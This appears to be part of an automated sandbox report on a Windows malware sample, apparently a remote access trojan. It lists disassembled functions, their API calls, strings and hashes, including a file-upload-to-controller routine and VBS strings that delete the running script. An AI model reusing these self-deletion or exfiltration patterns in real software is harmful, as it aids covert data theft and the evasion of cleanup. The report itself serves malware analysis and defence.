                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                • String ID: 6$C:\Users\user\Desktop\xi0TpAxHGMsm.exe$Pj$del$hdF$open
                                • API String ID: 1579085052-508949556
                                • Opcode ID: 4f87b9d86e0d177ce47a61f674f44f3f48b1c9db7a96dc1323a3ea9f6ed17011
                                • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                • Opcode Fuzzy Hash: 4f87b9d86e0d177ce47a61f674f44f3f48b1c9db7a96dc1323a3ea9f6ed17011
                                • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?), ref: 0041C036
                                • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                • lstrlenW.KERNEL32(?), ref: 0041C067
                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                • _wcslen.LIBCMT ref: 0041C13B
                                • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                • GetLastError.KERNEL32 ref: 0041C173
                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                • GetLastError.KERNEL32 ref: 0041C1D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                • String ID: ?
                                • API String ID: 3941738427-1684325040
                                • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                • Sleep.KERNEL32(00000064), ref: 00412E94
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                • String ID: /stext "$0TG$0TG$NG$NG
                                • API String ID: 1223786279-2576077980
                                • Opcode ID: fefa4fcaff023c9353dc8b0fd495dc9a770faaa34131ddf1702c86cb89b9f2bb
                                • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                • Opcode Fuzzy Hash: fefa4fcaff023c9353dc8b0fd495dc9a770faaa34131ddf1702c86cb89b9f2bb
                                • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408B7A Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 328fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                • __aulldiv.LIBCMT ref: 00408D4D
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $hdF$NG
                                • API String ID: 3086580692-1206044436
                                • Opcode ID: b6e4bd62b45e46aa0739a220c33f254e66673dd9c381c7277475c2bc153b6db5
                                • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                • Opcode Fuzzy Hash: b6e4bd62b45e46aa0739a220c33f254e66673dd9c381c7277475c2bc153b6db5
                                • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                Download Yara Rule
                                APIs
                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                • GetCursorPos.USER32(?), ref: 0041D5E9
                                • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                • ExitProcess.KERNEL32 ref: 0041D665
                                • CreatePopupMenu.USER32 ref: 0041D66B
                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                • String ID: Close
                                • API String ID: 1657328048-3535843008
                                • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$Info
                                • String ID:
                                • API String ID: 2509303402-0
                                • Opcode ID: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                • Opcode Fuzzy Hash: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419FB4 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 176sleeptimeCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00419FB9
                                • GdiplusStartup.GDIPLUS(po,?,00000000), ref: 00419FEB
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                • GetLocalTime.KERNEL32(?), ref: 0041A105
                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG$po
                                • API String ID: 489098229-3302684940
                                • Opcode ID: 74d135751b3a5a5dd2f0b0327ce2346d099fb9b4d0bdba82b7b527c99728bf6f
                                • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                • Opcode Fuzzy Hash: 74d135751b3a5a5dd2f0b0327ce2346d099fb9b4d0bdba82b7b527c99728bf6f
                                • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D7FF Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 148COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                  • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                  • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                  • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                • ExitProcess.KERNEL32 ref: 0040D9C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$hdF$open
                                • API String ID: 1913171305-51354631
                                • Opcode ID: ffab9c29fb179e10320a649d4d553e654e50398e427ab27dc765951fe3090336
                                • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                • Opcode Fuzzy Hash: ffab9c29fb179e10320a649d4d553e654e50398e427ab27dc765951fe3090336
                                • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414D86 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 109libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                • String ID: \ws2_32$\wship6$getaddrinfo
                                • API String ID: 2490988753-3078833738
                                • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 0045130A
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                  • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                • _free.LIBCMT ref: 004512FF
                                  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00451321
                                • _free.LIBCMT ref: 00451336
                                • _free.LIBCMT ref: 00451341
                                • _free.LIBCMT ref: 00451363
                                • _free.LIBCMT ref: 00451376
                                • _free.LIBCMT ref: 00451384
                                • _free.LIBCMT ref: 0045138F
                                • _free.LIBCMT ref: 004513C7
                                • _free.LIBCMT ref: 004513CE
                                • _free.LIBCMT ref: 004513EB
                                • _free.LIBCMT ref: 00451403
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                • String ID:
                                • API String ID: 3658366068-0
                                • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                • GetLastError.KERNEL32 ref: 00455CEF
                                • __dosmaperr.LIBCMT ref: 00455CF6
                                • GetFileType.KERNEL32(00000000), ref: 00455D02
                                • GetLastError.KERNEL32 ref: 00455D0C
                                • __dosmaperr.LIBCMT ref: 00455D15
                                • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                • CloseHandle.KERNEL32(?), ref: 00455E7F
                                • GetLastError.KERNEL32 ref: 00455EB1
                                • __dosmaperr.LIBCMT ref: 00455EB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: H
                                • API String ID: 4237864984-2852464175
                                • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                Download Yara Rule
                                APIs
